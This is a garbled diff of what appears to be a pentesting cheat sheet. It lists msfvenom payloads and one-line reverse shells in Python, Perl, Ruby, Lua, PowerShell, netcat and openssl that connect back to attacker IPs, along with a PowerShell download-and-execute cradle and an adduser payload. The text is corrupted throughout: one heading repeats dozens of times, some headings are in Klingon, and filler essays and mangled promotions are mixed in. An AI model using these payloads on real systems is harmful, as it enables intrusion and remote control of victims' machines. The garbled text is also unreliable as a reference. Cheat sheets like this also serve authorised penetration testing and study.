|
||||
- `<payload>`: The payload to use for the bind shell. This can be any payload supported by msfvenom.
|
||||
- `<attacker IP>`: The IP address of the attacker machine.
|
||||
- `<attacker port>`: The port on the attacker machine to listen for incoming connections.
|
||||
- `<format>`: The format of the output file. This can be any format supported by msfvenom, such as exe, elf, or raw.
|
||||
- `<output file>`: The name of the output file to save the generated shell.
|
||||
|
||||
Once the bind shell is created, you can transfer it to the target system and execute it. When the shell is executed, it will start listening for incoming connections on the specified IP address and port. The attacker can then connect to the shell and gain remote access to the target system.
|
||||
|
||||
It is important to note that using bind shells can be risky, as they expose the target system to potential attacks. Therefore, it is recommended to use bind shells only in controlled environments and with proper authorization.
|
||||
```bash
|
||||
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Create User
|
||||
### lo'la' User
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### CMD Shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
{% code overflow="wrap" %}### CMD Shell
|
||||
|
||||
CMD Shell- 'CMD Shell' is a Windows command-line interpreter that allows you to interact with the operating system through a command prompt. It is commonly used for executing commands, running scripts, and performing various administrative tasks on a Windows system.
|
||||
|
||||
To generate a payload using msfvenom for a CMD shell, you can use the following command:
|
||||
|
||||
```plaintext
|
||||
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > shell.exe
|
||||
```
|
||||
|
||||
This command will generate an executable file named 'shell.exe' that will establish a reverse TCP connection to the specified IP address and port. Replace `<attacker IP>` with your IP address and `<attacker port>` with the port you want to use for the connection.
|
||||
|
||||
Once you have generated the payload, you can transfer it to the target system and execute it to establish a reverse shell connection.
|
||||
```bash
|
||||
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### **Execute Command**
|
||||
### **QapHa'**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
|
||||
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Encoder
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
{% code overflow="wrap" %}### Encoder
|
||||
|
||||
{% code overflow="wrap" %}### Encoder
|
||||
```bash
|
||||
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Embedded inside executable
|
||||
### qarDaSqa' executable Daq
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -122,18 +200,34 @@ msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/wind
|
|||
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
|
||||
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Bind Shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
{% code overflow="wrap" %}### Bind Shell
|
||||
|
||||
Bind Shell is a technique used in hacking to create a shell on a target system that listens for incoming connections. This allows the attacker to gain remote access to the target system and execute commands.
|
||||
|
||||
To create a bind shell using msfvenom, you can use the following command:
|
||||
|
||||
```plaintext
|
||||
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output file>
|
||||
```
|
||||
|
||||
- `<payload>`: The payload to use for the bind shell. This can be any payload supported by msfvenom.
|
||||
- `<attacker IP>`: The IP address of the attacker machine.
|
||||
- `<attacker port>`: The port on the attacker machine to listen for incoming connections.
|
||||
- `<format>`: The format of the output file. This can be any format supported by msfvenom, such as exe, elf, or raw.
|
||||
- `<output file>`: The name of the output file to save the generated shell.
|
||||
|
||||
Once the bind shell is created, you can transfer it to the target system and execute it. When the shell is executed, it will start listening for incoming connections on the specified IP address and port. The attacker can then connect to the shell and gain remote access to the target system.
|
||||
|
||||
It is important to note that using bind shells can be risky, as they expose the target system to potential attacks. Therefore, it is recommended to use bind shells only in controlled environments and with proper authorization.
|
||||
```bash
|
||||
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### SunOS (Solaris)
|
||||
|
||||
{% code overflow="wrap" %}### SunOS (Solaris)
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
|
||||
|
@ -148,10 +242,10 @@ msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTAC
|
|||
```bash
|
||||
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### **Bind Shell**
|
||||
|
||||
{% code overflow="wrap" %}### **Bind Shell**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
|
||||
|
@ -186,6 +280,10 @@ msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
|
|||
|
||||
#### Reverse shell
|
||||
|
||||
{% code overflow="wrap" %}JSP
|
||||
|
||||
#### Reverse shell
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
|
||||
|
@ -200,18 +298,218 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f r
|
|||
```bash
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
|
||||
```
|
||||
{% endcode %}
|
||||
{% code %}
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
|
||||
### NodeJS
|
||||
```bash
|
||||
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
|
||||
```
|
||||
|
||||
## **Script Language payloads**
|
||||
|
||||
### **Perl**
|
||||
|
||||
{% code overflow="wrap" %}## **Script Language payloads**
|
||||
|
||||
### **Perl**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
|
||||
|
@ -236,7 +534,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
|
|||
|
||||
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
|
||||
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
|
||||
|
||||
**Hacking Insights**\
|
||||
Engage with content that delves into the thrill and challenges of hacking
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -28,15 +28,12 @@ The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Wi
|
|||
Obviously, **there aren't SUID files or sudo privileges in Windows**, but it's useful to know **how** some **binaries** can be (ab)used to perform some kind of unexpected actions like **execute arbitrary code.**
|
||||
|
||||
## NC
|
||||
|
||||
```bash
|
||||
nc.exe -e cmd.exe <Attacker_IP> <PORT>
|
||||
```
|
||||
|
||||
## SBD
|
||||
|
||||
**[sbd](https://www.kali.org/tools/sbd/) is a portable and secure Netcat alternative**. It works on Unix-like systems and Win32. With features like strong encryption, program execution, customizable source ports, and continuous reconnection, sbd provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version from the Kali Linux distribution can be used as a reliable replacement for Netcat.
|
||||
|
||||
**[sbd](https://www.kali.org/tools/sbd/) HochmeH je netcat alternative**. vItlhutlh Unix-like systemmey je Win32. vItlhutlh encryption, program execution, customizable source ports, je continuous reconnection, sbd vItlhutlh TCP/IP communication solution. Windows users, sbd.exe version vItlhutlh Kali Linux distribution netcat replacement.
|
||||
```bash
|
||||
# Victims machine
|
||||
sbd -l -p 4444 -e bash -v -n
|
||||
|
@ -48,47 +45,226 @@ sbd 10.10.10.10 4444
|
|||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
||||
|
||||
## Python
|
||||
|
||||
### Introduction
|
||||
|
||||
Python is a versatile and powerful programming language that is widely used in the field of hacking. It provides a wide range of libraries and modules that can be leveraged for various hacking tasks. In this section, we will explore some of the key features and functionalities of Python that make it an excellent choice for hacking.
|
||||
|
||||
### Key Features of Python for Hacking
|
||||
|
||||
1. **Simplicity**: Python has a clean and easy-to-understand syntax, making it beginner-friendly and allowing hackers to quickly write and execute code.
|
||||
|
||||
2. **Portability**: Python is a cross-platform language, meaning that Python code can run on different operating systems without any modifications. This makes it convenient for hackers who need to work on multiple platforms.
|
||||
|
||||
3. **Extensibility**: Python allows hackers to easily extend its functionality by importing and using various libraries and modules. There are numerous libraries available for tasks such as network scanning, web scraping, cryptography, and more.
|
||||
|
||||
4. **Interactivity**: Python provides an interactive shell, which allows hackers to execute code line by line and see the results immediately. This makes it easier to debug and test code during the hacking process.
|
||||
|
||||
5. **Integration**: Python can be easily integrated with other languages, such as C and C++, allowing hackers to leverage existing code and libraries written in these languages.
|
||||
|
||||
### Python Libraries for Hacking
|
||||
|
||||
Python offers a wide range of libraries that can be used for hacking purposes. Some of the most commonly used libraries include:
|
||||
|
||||
- **Scapy**: A powerful packet manipulation library that allows hackers to create, send, and capture network packets.
|
||||
|
||||
- **Requests**: A library for making HTTP requests, which is useful for tasks such as web scraping and interacting with web applications.
|
||||
|
||||
- **Paramiko**: A library for SSH protocol implementation, which allows hackers to automate tasks such as remote command execution and file transfer.
|
||||
|
||||
- **Crypto**: A library that provides various cryptographic functions, such as encryption, decryption, hashing, and more.
|
||||
|
||||
- **BeautifulSoup**: A library for parsing HTML and XML documents, which is useful for web scraping and extracting data from websites.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Python is a versatile and powerful programming language that is widely used in the field of hacking. Its simplicity, portability, extensibility, interactivity, and integration capabilities make it an excellent choice for hackers. By leveraging the various libraries available in Python, hackers can perform a wide range of hacking tasks efficiently and effectively.
|
||||
```bash
|
||||
#Windows
|
||||
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||||
```
|
||||
Perl is a high-level programming language that is commonly used for scripting and automation tasks. It is known for its powerful text processing capabilities and its ability to work well with other programming languages. Perl scripts can be executed on various operating systems, including Windows.
|
||||
|
||||
## Perl
|
||||
Perl is often used by hackers for various purposes, such as writing exploit scripts or automating tasks during a penetration test. It provides a wide range of built-in functions and modules that can be leveraged for hacking activities.
|
||||
|
||||
When using Perl for hacking, it is important to have a good understanding of the language and its syntax. This includes knowledge of variables, control structures, regular expressions, and file handling. Additionally, familiarity with Perl modules that are commonly used in hacking, such as Net::FTP or Net::SSH, can be beneficial.
|
||||
|
||||
Perl can be installed on Windows by downloading and running the installer from the official Perl website. Once installed, Perl scripts can be executed from the command line by typing "perl" followed by the script name.
|
||||
|
||||
When writing Perl scripts for hacking purposes, it is important to follow best practices to ensure the code is secure and efficient. This includes sanitizing user input, properly handling errors, and using encryption when necessary.
|
||||
|
||||
Overall, Perl is a versatile programming language that can be a valuable tool for hackers. Its extensive functionality and cross-platform compatibility make it a popular choice for scripting and automation in the hacking community.
|
||||
```bash
|
||||
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
### Introduction
|
||||
|
||||
## Ruby
|
||||
Ruby is a dynamic, object-oriented programming language that is known for its simplicity and readability. It was created in the mid-1990s by Yukihiro Matsumoto, also known as Matz. Ruby has gained popularity among developers due to its elegant syntax and powerful features.
|
||||
|
||||
### Features
|
||||
|
||||
Ruby offers a wide range of features that make it a versatile language for various applications. Some of the key features of Ruby include:
|
||||
|
||||
1. **Dynamic Typing**: Ruby is dynamically typed, which means that variable types are determined at runtime. This allows for more flexibility and easier code maintenance.
|
||||
|
||||
2. **Object-Oriented**: Ruby is a fully object-oriented language, where everything is an object. This allows for the use of classes, inheritance, and polymorphism, making it easier to organize and structure code.
|
||||
|
||||
3. **Garbage Collection**: Ruby has built-in garbage collection, which automatically manages memory allocation and deallocation. This helps developers focus on writing code without worrying about memory management.
|
||||
|
||||
4. **Blocks and Procs**: Ruby supports blocks and procs, which are anonymous functions that can be passed as arguments to methods. This allows for more concise and expressive code.
|
||||
|
||||
5. **Metaprogramming**: Ruby has powerful metaprogramming capabilities, allowing developers to modify and extend the language itself. This enables the creation of domain-specific languages and flexible frameworks.
|
||||
|
||||
### Syntax
|
||||
|
||||
Ruby has a clean and readable syntax that is designed to be easy to understand and write. Here are some examples of Ruby syntax:
|
||||
|
||||
```ruby
|
||||
# Variables
|
||||
name = "John"
|
||||
age = 25
|
||||
|
||||
# Conditionals
|
||||
if age >= 18
|
||||
puts "You are an adult"
|
||||
else
|
||||
puts "You are a minor"
|
||||
end
|
||||
|
||||
# Loops
|
||||
for i in 1..5
|
||||
puts i
|
||||
end
|
||||
|
||||
# Methods
|
||||
def greet(name)
|
||||
puts "Hello, #{name}!"
|
||||
end
|
||||
|
||||
greet("Alice")
|
||||
```
|
||||
|
||||
### Resources
|
||||
|
||||
There are many resources available for learning Ruby and improving your skills. Here are some recommended resources:
|
||||
|
||||
- [Ruby Documentation](https://ruby-doc.org/): The official documentation for Ruby, which provides detailed information about the language and its standard library.
|
||||
|
||||
- [RubyGems](https://rubygems.org/): A package manager for Ruby that allows you to easily install and manage libraries and frameworks.
|
||||
|
||||
- [Ruby Toolbox](https://www.ruby-toolbox.com/): A website that provides a curated list of Ruby libraries and tools, categorized by functionality.
|
||||
|
||||
- [Ruby on Rails](https://rubyonrails.org/): A popular web application framework built with Ruby. It provides a set of conventions and tools for building robust and scalable web applications.
|
||||
|
||||
- [RubyMine](https://www.jetbrains.com/ruby/): An integrated development environment (IDE) specifically designed for Ruby development. It offers advanced features such as code completion, debugging, and refactoring tools.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Ruby is a powerful and expressive programming language that offers a wide range of features and a clean syntax. Whether you are a beginner or an experienced developer, learning Ruby can greatly enhance your programming skills and productivity.
|
||||
```bash
|
||||
#Windows
|
||||
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
### Introduction
|
||||
|
||||
## Lua
|
||||
Lua is a lightweight, high-level programming language designed primarily for embedded systems and scripting. It is often used as a scripting language in video games and other applications that require customizable behavior. Lua is known for its simplicity, efficiency, and ease of integration with other languages.
|
||||
|
||||
### Features
|
||||
|
||||
- **Lightweight**: Lua has a small footprint and minimal resource requirements, making it suitable for use in resource-constrained environments.
|
||||
- **High-level**: Lua provides a simple and expressive syntax that is easy to read and write.
|
||||
- **Embeddable**: Lua can be easily embedded into other applications, allowing developers to extend the functionality of their software.
|
||||
- **Dynamic typing**: Lua uses dynamic typing, which means that variables do not have a fixed type and can be assigned values of different types at runtime.
|
||||
- **Garbage collection**: Lua has automatic memory management through garbage collection, which helps developers avoid memory leaks and other memory-related issues.
|
||||
- **Extensibility**: Lua can be extended with C/C++ code, allowing developers to leverage existing libraries and functionality.
|
||||
- **Portability**: Lua is written in ANSI C and can be compiled and run on a wide range of platforms, including Windows, macOS, Linux, and various embedded systems.
|
||||
|
||||
### Usage
|
||||
|
||||
Lua can be used in a variety of ways, including:
|
||||
|
||||
- **Scripting**: Lua is often used as a scripting language in video games, allowing developers to define game logic and behavior in a flexible and customizable way.
|
||||
- **Embedded systems**: Lua's small footprint and low resource requirements make it suitable for use in embedded systems, such as IoT devices and microcontrollers.
|
||||
- **Extension language**: Lua can be embedded into other applications as an extension language, allowing developers to add scripting capabilities to their software.
|
||||
- **Prototyping**: Lua's simplicity and ease of use make it a popular choice for rapid prototyping and experimentation.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Lua is a versatile and lightweight programming language that is well-suited for embedded systems, scripting, and extension purposes. Its simplicity, efficiency, and ease of integration make it a popular choice among developers. Whether you are developing a video game, an IoT device, or a software application, Lua can be a valuable tool in your toolkit.
|
||||
```bash
|
||||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
|
||||
## OpenSSH
|
||||
|
||||
Attacker (Kali)
|
||||
|
||||
```bash
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||||
```
|
||||
# Windows Shells
|
||||
|
||||
Victim
|
||||
## Introduction
|
||||
|
||||
In the context of hacking, a shell refers to a command-line interface that allows an attacker to interact with a compromised system. In this section, we will explore various methods to obtain and maintain a shell on a Windows machine.
|
||||
|
||||
## Reverse Shells
|
||||
|
||||
A reverse shell is a technique where the attacker sets up a listener on their machine and the compromised system connects back to it. This allows the attacker to gain remote access to the victim's machine.
|
||||
|
||||
### Netcat
|
||||
|
||||
Netcat is a versatile networking utility that can be used to create reverse shells. It is available for both Windows and Linux systems.
|
||||
|
||||
To create a reverse shell using Netcat on Windows, follow these steps:
|
||||
|
||||
1. Set up a listener on your machine: `nc -lvp <port>`
|
||||
|
||||
2. Execute the following command on the victim's machine: `nc <attacker_ip> <port> -e cmd.exe`
|
||||
|
||||
### PowerShell
|
||||
|
||||
PowerShell is a powerful scripting language that is built into Windows. It can be used to create reverse shells as well.
|
||||
|
||||
To create a reverse shell using PowerShell, follow these steps:
|
||||
|
||||
1. Set up a listener on your machine: `nc -lvp <port>`
|
||||
|
||||
2. Execute the following command on the victim's machine: `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>', <port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`
|
||||
|
||||
## Web Shells
|
||||
|
||||
Web shells are scripts or programs that are uploaded to a compromised web server. They provide a web-based interface for an attacker to execute commands on the server.
|
||||
|
||||
### PHP Shell
|
||||
|
||||
PHP shells are one of the most common types of web shells. They are written in PHP and can be uploaded to a web server via various methods, such as file upload vulnerabilities or command injection.
|
||||
|
||||
To use a PHP shell, follow these steps:
|
||||
|
||||
1. Upload the PHP shell to the target web server.
|
||||
|
||||
2. Access the PHP shell through a web browser.
|
||||
|
||||
3. Use the provided interface to execute commands on the server.
|
||||
|
||||
### ASPX Shell
|
||||
|
||||
ASPX shells are web shells written in ASP.NET. They can be uploaded to a web server that supports ASP.NET applications.
|
||||
|
||||
To use an ASPX shell, follow these steps:
|
||||
|
||||
1. Upload the ASPX shell to the target web server.
|
||||
|
||||
2. Access the ASPX shell through a web browser.
|
||||
|
||||
3. Use the provided interface to execute commands on the server.
|
||||
|
||||
## Conclusion
|
||||
|
||||
Obtaining and maintaining a shell on a Windows machine is a crucial step in the hacking process. Reverse shells and web shells are powerful techniques that allow attackers to gain remote access and execute commands on compromised systems. It is important for both attackers and defenders to understand these methods in order to protect against them.
|
||||
```bash
|
||||
#Linux
|
||||
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
|
@ -96,38 +272,72 @@ openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_clien
|
|||
#Windows
|
||||
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
```
|
||||
|
||||
## Powershell
|
||||
|
||||
### Introduction
|
||||
|
||||
Powershell is a powerful scripting language and automation framework developed by Microsoft. It is designed specifically for system administration and task automation on Windows operating systems. With its extensive set of commands and features, Powershell provides a versatile environment for managing and controlling Windows systems.
|
||||
|
||||
### Features
|
||||
|
||||
Powershell offers several key features that make it a popular choice among system administrators and hackers:
|
||||
|
||||
- **Command-line interface**: Powershell provides a command-line interface (CLI) that allows users to interact with the operating system and execute commands. This makes it easy to perform various tasks and automate repetitive actions.
|
||||
|
||||
- **Scripting language**: Powershell is a full-fledged scripting language that supports variables, loops, conditionals, and other programming constructs. This allows users to write complex scripts to automate tasks and perform system administration tasks.
|
||||
|
||||
- **Object-oriented**: Powershell treats everything as an object, including files, processes, and registry keys. This object-oriented approach makes it easy to manipulate and manage system resources.
|
||||
|
||||
- **Integration with .NET**: Powershell is built on top of the .NET framework, which provides access to a wide range of libraries and APIs. This allows users to leverage the power of .NET to perform advanced tasks and interact with external systems.
|
||||
|
||||
### Basic Usage
|
||||
|
||||
To start Powershell, open a command prompt and type `powershell`. This will launch the Powershell CLI, where you can start executing commands and running scripts.
|
||||
|
||||
Here are some basic commands to get you started:
|
||||
|
||||
- `Get-Process`: Lists all running processes on the system.
|
||||
- `Get-Service`: Lists all installed services on the system.
|
||||
- `Get-ChildItem`: Lists all files and directories in the current directory.
|
||||
- `Set-ExecutionPolicy`: Sets the execution policy for Powershell scripts.
|
||||
- `Invoke-Expression`: Executes a string as a command.
|
||||
|
||||
### Advanced Usage
|
||||
|
||||
Powershell provides a wide range of advanced features and capabilities. Here are some examples:
|
||||
|
||||
- **Remote administration**: Powershell can be used to remotely manage and administer Windows systems. It supports remote execution of commands and scripts, allowing administrators to perform tasks on multiple machines simultaneously.
|
||||
|
||||
- **Script execution**: Powershell scripts can be executed in various ways, including running them directly from the command line, scheduling them to run at specific times, or embedding them in other scripts or applications.
|
||||
|
||||
- **Module system**: Powershell supports the use of modules, which are collections of functions and scripts that can be imported and used in other scripts. This allows users to extend the functionality of Powershell and reuse code.
|
||||
|
||||
- **PowerShell Gallery**: The PowerShell Gallery is a repository of Powershell modules and scripts that can be downloaded and used by the community. It provides a convenient way to discover and share Powershell resources.
|
||||
|
||||
### Conclusion
|
||||
|
||||
